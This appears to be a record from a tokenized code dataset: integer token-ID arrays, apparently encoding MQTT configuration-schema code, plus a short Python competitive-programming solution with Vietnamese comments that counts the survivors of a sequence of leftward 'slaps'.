10943, 37, 62, 18831, 4061, 62, 34, 17395, 62, 44175, 62, 50084, 796, 366, 48267, 62, 22583, 62, 31522, 62, 9122, 1, 628, 198, 198, 49215, 15751, 62, 44, 1546, 4090, 8264, 62, 33, 11159, 796, 269, 85, 13, 27054, 2611, 7, 198, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 35222, 2149, 2599, 269, 85, 13, 12984, 1836, 62, 26652, 11, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 48, 2640, 11, 4277, 28, 15, 2599, 269, 85, 13, 76, 80, 926, 62, 80, 418, 11, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 2200, 30339, 11, 4277, 28, 17821, 2599, 269, 85, 13, 2127, 21052, 11, 198, 220, 220, 220, 1782, 198, 8, 198, 198, 49215, 15751, 62, 44, 1546, 4090, 8264, 62, 51, 3620, 6489, 6158, 62, 50, 3398, 27630, 796, 269, 85, 13, 7149, 7, 198, 220, 220, 220, 6045, 11, 337, 48, 15751, 62, 44, 1546, 4090, 8264, 62, 33, 11159, 11, 26571, 62, 20500, 62, 3137, 62, 26652, 198, 8, 198, 198, 49215, 15751, 62, 44, 1546, 4090, 8264, 62, 50, 3398, 27630, 796, 269, 85, 13, 7149, 7, 198, 220, 220, 220, 6045, 11, 198, 220, 220, 220, 337, 48, 15751, 62, 44, 1546, 4090, 8264, 62, 33, 11159, 13, 2302, 437, 7, 198, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 4537, 56, 35613, 2599, 269, 85, 13, 76, 80, 926, 62, 15577, 2220, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 10612, 198, 8, 198, 198, 76, 80, 926, 62, 5907, 796, 269, 70, 13, 274, 746, 462, 62, 5907, 13, 14933, 10223, 7203, 76, 80, 926, 4943, 198, 49215, 15751, 12837, 796, 285, 80, 926, 62, 5907, 13, 7249, 7203, 49215, 15751, 12837, 4943, 198, 49215, 15751, 11792, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 11792, 21950, 1600, 269, 70, 13, 21950, 8, 198, 49215, 51, 7250, 549, 1836, 12502, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 7250, 549, 1836, 12502, 1600, 22771, 13, 12502, 8, 198, 49215, 51, 7250, 549, 1836, 41, 1559, 12502, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 7250, 549, 1836, 41, 1559, 12502, 1600, 22771, 13, 12502, 8, 198, 49215, 15751, 12837, 48344, 796, 285, 80, 926, 62, 5907, 13, 4871, 41052, 198, 220, 220, 220, 366, 49215, 15751, 12837, 48344, 1600, 22771, 13, 48344, 13, 28243, 7, 66, 70, 13, 19282, 62, 8841, 828, 269, 70, 13, 21950, 198, 8, 198, 49215, 15751, 41, 1559, 12837, 48344, 796, 285, 80, 926, 62, 5907, 13, 4871, 41052, 198, 220, 220, 220, 366, 49215, 15751, 41, 1559, 12837, 48344, 1600, 22771, 13, 48344, 13, 28243, 7, 66, 70, 13, 41, 1559, 10267, 34184, 8, 198, 8, 198, 49215, 15751, 13313, 48344, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 13313, 48344, 1600, 22771, 13, 48344, 13, 28243, 28955, 198, 49215, 15751, 7279, 8443, 48344, 796, 285, 80, 926, 62, 5907, 13, 4871, 41052, 198, 220, 220, 220, 366, 49215, 15751, 7279, 8443, 48344, 1600, 22771, 13, 48344, 13, 28243, 3419, 198, 8, 198, 49215, 51, 4825, 3361, 3471, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 4825, 3361, 3471, 1600, 269, 70, 13, 21950, 8, 198, 49215, 15751, 13313, 276, 48362, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 13313, 276, 48362, 1600, 24295, 8, 198, 198, 49215, 15751, 33, 3219, 47864, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 33, 3219, 47864, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 15751, 37649, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 37649, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 51, 4825, 2502, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 4825, 2502, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 51, 10234, 272, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 10234, 272, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 15751, 40386, 15047, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 40386, 15047, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 51, 4694, 22854, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 4694, 22854, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 51, 4694, 42248, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 4694, 42248, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 15751, 8206, 47864, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 8206, 47864, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 15751, 15057, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 15057, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 15751, 17563, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 17563, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 15751, 21864, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 15751, 21864, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 49215, 51, 14990, 735, 21950, 796, 285, 80, 926, 62, 5907, 13, 4871, 62, 7203, 49215, 51, 14990, 735, 21950, 1600, 337, 48, 51, 4825, 3361, 3471, 8, 198, 198, 49215, 15751, 35, 40821, 40257, 7390, 8645, 1352, 796, 285, 80, 926, 62, 5907, 13, 44709, 7203, 49215, 15751, 35, 40821, 40257, 7390, 8645, 1352, 4943, 198, 49215, 15751, 62, 26288, 8220, 5959, 56, 62, 4944, 33866, 8924, 62, 2389, 62, 35353, 1137, 25633, 62, 3185, 51, 11053, 796, 1391, 198, 220, 220, 220, 366, 1455, 1590, 1298, 337, 48, 15751, 35, 40821, 40257, 7390, 8645, 1352, 13, 49215, 15751, 62, 2538, 38, 43300, 62, 4944, 33866, 8924, 62, 2389, 62, 35353, 1137, 25633, 11, 198, 220, 220, 220, 366, 20285, 1298, 337, 48, 15751, 35, 40821, 40257, 7390, 8645, 1352, 13, 49215, 15751, 62, 44721, 62, 2885, 7707, 7597, 62, 4944, 33866, 8924, 62, 2389, 62, 35353, 1137, 25633, 11, 198, 92, 198, 198, 49215, 15751, 35, 40821, 10267, 7390, 8645, 1352, 796, 285, 80, 926, 62, 5907, 13, 44709, 7203, 49215, 15751, 35, 40821, 10267, 7390, 8645, 1352, 4943, 198, 49215, 15751, 62, 26288, 8220, 5959, 56, 62, 9864, 23680, 62, 2389, 62, 35353, 1137, 25633, 62, 3185, 51, 11053, 796, 1391, 198, 220, 220, 220, 366, 23108, 1298, 337, 48, 15751, 35, 40821, 10267, 7390, 8645, 1352, 13, 49215, 15751, 62, 45, 11651, 62, 9864, 23680, 62, 2389, 62, 35353, 1137, 25633, 11, 198, 220, 220, 220, 366, 25202, 62, 3672, 1298, 337, 48, 15751, 35, 40821, 10267, 7390, 8645, 1352, 13, 49215, 15751, 62, 7206, 27389, 62, 20608, 62, 9864, 23680, 62, 2389, 62, 35353, 1137, 25633, 11, 198, 92, 628, 628, 198, 10943, 16254, 62, 50, 3398, 27630, 796, 269, 85, 13, 3237, 7, 198, 220, 220, 220, 269, 85, 13, 27054, 2611, 7, 198, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 33529, 269, 85, 13, 32446, 533, 62, 312, 7, 49215, 15751, 11792, 21950, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 11473, 11380, 1137, 2599, 269, 85, 13, 8841, 62, 301, 2012, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 15490, 11, 4277, 28, 1507, 5999, 2599, 269, 85, 13, 634, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 29904, 20608, 11, 4277, 33151, 2599, 269, 85, 13, 8841, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 47924, 54, 12532, 11, 4277, 33151, 2599, 269, 85, 13, 8841, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 5097, 28495, 62, 2389, 2599, 269, 85, 13, 8841, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 41205, 19463, 7, 10943, 37, 62, 2389, 37, 62, 50, 10619, 62, 26483, 7792, 11, 15024, 2624, 62, 312, 69, 28, 25101, 2599, 269, 85, 13, 3237, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 2127, 21052, 11, 269, 85, 13, 8807, 62, 4480, 62, 9774, 62, 312, 69, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 34, 17395, 30643, 6158, 62, 32, 24318, 1581, 9050, 2599, 269, 85, 13, 3237, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8841, 11, 269, 85, 13, 8807, 62, 4480, 62, 9774, 62, 312, 69, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 41205, 19463, 7, 10943, 37, 62, 18831, 4061, 62, 34, 17395, 62, 44175, 62, 50084, 11, 15024, 2624, 62, 312, 69, 28, 25101, 2599, 269, 85, 13, 3237, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 2127, 21052, 11, 269, 85, 13, 8807, 62, 4480, 62, 9774, 62, 312, 69, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 26288, 8220, 5959, 56, 11, 4277, 28, 17821, 2599, 269, 85, 13, 7149, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 2127, 21052, 11, 269, 85, 13, 505, 62, 1659, 7203, 29931, 1565, 1600, 6727, 28, 17821, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 26288, 8220, 5959, 56, 62, 2200, 30339, 11, 4277, 28, 17821, 2599, 269, 85, 13, 2127, 21052, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7102, 37, 62, 26288, 8220, 5959, 56, 62, 47, 31688, 10426, 11, 4277, 2625, 11195, 562, 10167, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 15179, 269, 85, 13, 12984, 1836, 62, 26652, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 26288, 8220, 5959, 56, 62, 4944, 33866, 8924, 62, 2389, 62, 35353, 1137, 25633, 11, 4277, 2625, 1455, 1590, 1, 2599, 269, 85, 13, 44709, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 337, 48, 15751, 62, 26288, 8220, 5959, 56, 62, 4944, 33866, 8924, 62, 2389, 62, 35353, 1137, 25633, 62, 3185, 51, 11053, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 26288, 8220, 5959, 56, 62, 9864, 23680, 62, 2389, 62, 35353, 1137, 25633, 11, 4277, 2625, 23108, 1, 2599, 269, 85, 13, 44709, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 337, 48, 15751, 62, 26288, 8220, 5959, 56, 62, 9864, 23680, 62, 2389, 62, 35353, 1137, 25633, 62, 3185, 51, 11053, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 19108, 62, 6242, 40438, 12861, 18421, 11, 4277, 28, 17821, 2599, 269, 85, 13, 2127, 21052, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 3483, 49, 4221, 62, 44, 1546, 4090, 8264, 2599, 337, 48, 15751, 62, 44, 1546, 4090, 8264, 62, 50, 3398, 27630, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 54, 8267, 62, 44, 1546, 4090, 8264, 2599, 337, 48, 15751, 62, 44, 1546, 4090, 8264, 62, 50, 3398, 27630, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 9693, 3843, 41925, 62, 44, 1546, 4090, 8264, 2599, 337, 48, 15751, 62, 44, 1546, 4090, 8264, 62, 50, 3398, 27630, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 35222, 2149, 62, 47, 31688, 10426, 11, 4277, 28, 50033, 25, 327, 6965, 13, 3672, 2599, 269, 85, 13, 12984, 1836, 62, 26652, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 25294, 62, 35222, 2149, 2599, 269, 85, 13, 7149, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 6045, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 337, 48, 15751, 62, 44, 1546, 4090, 8264, 62, 33, 11159, 13, 2302, 437, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 2538, 18697, 2599, 49706, 13, 271, 62, 6404, 62, 5715, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 26571, 62, 20500, 62, 3137, 62, 26652, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 31127, 62, 37, 2751, 1137, 4805, 1268, 4694, 2599, 269, 85, 13, 3237, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8807, 62, 261, 62, 9774, 23, 25540, 11, 269, 85, 13, 641, 495, 62, 4868, 7, 12102, 378, 62, 35461, 4798, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 42, 35238, 1847, 9306, 11, 4277, 2625, 1314, 82, 1, 2599, 269, 85, 13, 24561, 62, 2435, 62, 41007, 62, 43012, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7102, 37, 62, 2200, 8202, 2394, 62, 34694, 12425, 11, 4277, 2625, 1314, 1084, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 15179, 269, 85, 13, 24561, 62, 2435, 62, 41007, 62, 17805, 27866, 24764, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 1340, 62, 10943, 48842, 2599, 22771, 13, 12102, 378, 62, 2306, 296, 341, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 7, 10943, 37, 62, 5446, 3528, 30373, 62, 2389, 2599, 269, 85, 13, 32446, 533, 62, 312, 7, 49215, 15751, 13313, 48344, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 1340, 62, 26288, 10943, 48842, 2599, 22771, 13, 12102, 378, 62, 2306, 296, 341, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 7, 10943, 37, 62, 5446, 3528, 30373, 62, 2389, 2599, 269, 85, 13, 32446, 533, 62, 312, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 337, 48, 15751, 7279, 8443, 48344, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 1340, 62, 44, 1546, 4090, 8264, 2599, 22771, 13, 12102, 378, 62, 2306, 296, 341, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 7, 10943, 37, 62, 5446, 3528, 30373, 62, 2389, 2599, 269, 85, 13, 32446, 533, 62, 312, 7, 49215, 15751, 12837, 48344, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 35222, 2149, 2599, 269, 85, 13, 7266, 12522, 62, 26652, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 48, 2640, 11, 4277, 28, 15, 2599, 269, 85, 13, 76, 80, 926, 62, 80, 418, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 4537, 56, 35613, 2599, 269, 85, 13, 8841, 62, 301, 2012, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 1340, 62, 40386, 62, 44, 1546, 4090, 8264, 2599, 22771, 13, 12102, 378, 62, 2306, 296, 341, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 7, 10943, 37, 62, 5446, 3528, 30373, 62, 2389, 2599, 269, 85, 13, 32446, 533, 62, 312, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 337, 48, 15751, 41, 1559, 12837, 48344, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 35222, 2149, 2599, 269, 85, 13, 7266, 12522, 62, 26652, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 48, 2640, 11, 4277, 28, 15, 2599, 269, 85, 13, 76, 80, 926, 62, 80, 418, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10612, 198, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 10612, 198, 220, 220, 220, 26571, 62, 11250, 11, 198, 8, 628, 198, 198, 31, 10215, 28399, 62, 4480, 62, 49336, 7, 1821, 13, 15, 8, 628, 198, 49215, 15751, 62, 5105, 9148, 18422, 62, 44710, 62, 50, 3398, 27630, 796, 269, 85, 13, 27054, 2611, 7, 198, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 33529, 269, 85, 13, 1904, 62, 312, 7, 49215, 15751, 11792, 21950, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 35222, 2149, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 12984, 1836, 62, 26652, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 4537, 56, 35613, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 76, 80, 926, 62, 15577, 2220, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 48, 2640, 11, 4277, 28, 15, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 76, 80, 926, 62, 80, 418, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 2200, 30339, 11, 4277, 28, 25101, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 2127, 21052, 828, 198, 220, 220, 220, 1782, 198, 8, 628, 198, 31, 2306, 296, 341, 13, 30238, 62, 2673, 7, 198, 220, 220, 220, 366, 76, 80, 926, 13, 12984, 1836, 1600, 337, 48, 51, 7250, 549, 1836, 12502, 11, 337, 48, 15751, 62, 5105, 9148, 18422, 62, 44710, 62, 50, 3398, 27630, 198, 8, 628, 198, 49215, 15751, 62, 5105, 9148, 18422, 62, 40386, 62, 44710, 62, 50, 3398, 27630, 796, 269, 85, 13, 27054, 2611, 7, 198, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 33529, 269, 85, 13, 1904, 62, 312, 7, 49215, 15751, 11792, 21950, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 35222, 2149, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 12984, 1836, 62, 26652, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 37374, 7, 10943, 37, 62, 4537, 56, 35613, 2599, 269, 85, 13, 50033, 62, 11, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 48, 2640, 11, 4277, 28, 15, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 76, 80, 926, 62, 80, 418, 828, 198, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 30719, 7, 10943, 37, 62, 2200, 30339, 11, 4277, 28, 25101, 2599, 269, 85, 13, 11498, 489, 21156, 7, 33967, 13, 2127, 21052, 828, 198, 220, 220, 220, 1782, 198, 8, 628, 198, 31, 2306, 296, 341, 13, 30238, 62, 2673, 7, 198, 220, 220, 220, 366, 76, 80, 926, 13, 12984, 1836, 62, 17752, 1600, 337, 48, 51, 7250, 549, 1836, 41, 1559, 12502, 11, 337, 48, 15751, 62, 5105, 9148, 18422, 62, 40386, 62, 44710, 62, 50, 3398, 27630, 198, 8, 628, 628, 198, 31, 2306, 296, 341, 13, 30238, 62, 31448, 7, 198, 220, 220, 220, 366, 76, 80, 926, 13, 15236, 1600, 198, 220, 220, 220, 337, 48, 15751, 13313, 276, 48362, 11, 198, 220, 220, 220, 269, 85, 13, 27054, 2611, 7, 198, 220, 220, 220, 220, 220, 220, 220, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 269, 85, 13, 8645, 378, 2389, 33529, 269, 85, 13, 1904, 62, 312, 7, 49215, 15751, 11792, 21950, 828, 198, 220, 220, 220, 220, 220, 220, 220, 1782, 198, 220, 220, 220, 10612, 198, 8, 198 ]
1.912754
4,814
n = int(input()) a = list(map(int, input().split())) count = 0 j = n - 1 #j là giới hạn bắt đầu của một lần vả: j giúp chống lặp người đã bị giết. #j phải luôn bé hơn i, vì người ở i chỉ vả được những người ở bên trái nó. #last_kill_pos: là giới hạn kết thúc của một lần vả. for i in range(n - 1, -1 , -1): j = min(i, j) last_kill_pos = max(0, i - a[i]) if j > last_kill_pos: count += (j - last_kill_pos) j = last_kill_pos print(n - count)
[ 77, 796, 493, 7, 15414, 28955, 198, 64, 796, 1351, 7, 8899, 7, 600, 11, 5128, 22446, 35312, 3419, 4008, 198, 198, 9127, 796, 657, 198, 73, 796, 299, 532, 352, 198, 2, 73, 300, 24247, 308, 72, 157, 119, 249, 72, 289, 157, 118, 94, 77, 275, 157, 118, 107, 83, 34754, 239, 157, 118, 100, 84, 269, 157, 119, 100, 64, 285, 157, 119, 247, 83, 300, 157, 118, 100, 77, 410, 157, 118, 96, 25, 474, 308, 72, 21356, 79, 442, 157, 119, 239, 782, 300, 157, 118, 115, 79, 23370, 130, 108, 157, 119, 251, 72, 34754, 239, 26102, 275, 157, 119, 233, 308, 72, 157, 118, 123, 83, 13, 198, 2, 73, 872, 157, 118, 96, 72, 300, 84, 27083, 77, 275, 2634, 289, 130, 94, 77, 1312, 11, 410, 127, 105, 23370, 130, 108, 157, 119, 251, 72, 28053, 119, 253, 1312, 442, 157, 119, 231, 410, 157, 118, 96, 34754, 239, 130, 108, 157, 119, 96, 66, 299, 71, 157, 119, 107, 782, 23370, 130, 108, 157, 119, 251, 72, 28053, 119, 253, 275, 25792, 77, 491, 6557, 72, 299, 10205, 13, 198, 2, 12957, 62, 12728, 62, 1930, 25, 300, 24247, 308, 72, 157, 119, 249, 72, 289, 157, 118, 94, 77, 479, 157, 118, 123, 83, 294, 21356, 66, 269, 157, 119, 100, 64, 285, 157, 119, 247, 83, 300, 157, 118, 100, 77, 410, 157, 118, 96, 13, 628, 198, 1640, 1312, 287, 2837, 7, 77, 532, 352, 11, 532, 16, 837, 532, 16, 2599, 198, 197, 73, 796, 949, 7, 72, 11, 474, 8, 198, 197, 12957, 62, 12728, 62, 1930, 796, 3509, 7, 15, 11, 1312, 532, 257, 58, 72, 12962, 628, 197, 361, 474, 1875, 938, 62, 12728, 62, 1930, 25, 198, 197, 197, 9127, 15853, 357, 73, 532, 938, 62, 12728, 62, 1930, 8, 198, 197, 197, 73, 796, 938, 62, 12728, 62, 1930, 198, 220, 220, 220, 